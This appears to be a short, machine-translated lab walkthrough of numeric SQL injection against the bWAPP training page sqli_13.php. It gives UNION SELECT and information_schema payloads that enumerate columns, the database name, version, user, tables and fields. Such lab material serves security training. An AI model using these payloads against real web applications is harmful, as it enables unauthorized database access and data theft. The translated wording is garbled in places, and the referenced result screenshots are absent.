1. Look at the post parameters and construct them in the same way, the result
2, enter "Movie=1" in the Hackbar post box, the error contains three single quotes, indicating that it should be a digital injection, the results
3, input "movie=1 and 1=1" Normal, input "movie=1 and 1=2" error, the results such as:
So there's a digital injection point in the place.
4, Judge the number of fields:
Enter "movie=1 ORDER by 7" Normal, enter "movie=1 ORDER by 8" error, indicating the number of fields is 7, the result
View the display location, enter "movie=-1 union select 1,2,3,4,5,6,7", result
5, query database and other information:
Enter "Movie=-1 Union select 1,database (), version (), 4,user (), 6,7", view database name, database version, current user, results
6. Query Table name:
Input "movie=-1 Union select 1,database (), version (), Table_name,user (), 6,7 from Information_schema.tables where Table_ Schema= ' Bwapp ', table named blog, results
7. Query Field Name:
Input "movie=-1 Union select 1,database (), version (), Column_name,user (), 6,7 from Information_schema.columns where Table_ Name= ' blog ', field named ID, result
8, query the contents of the field:
Enter "Movie=-1 Union select 1,database (), version (), Id,user (), 6,7 from blog", Field no content.
The Bwapp of SQL injection sqli_13.php
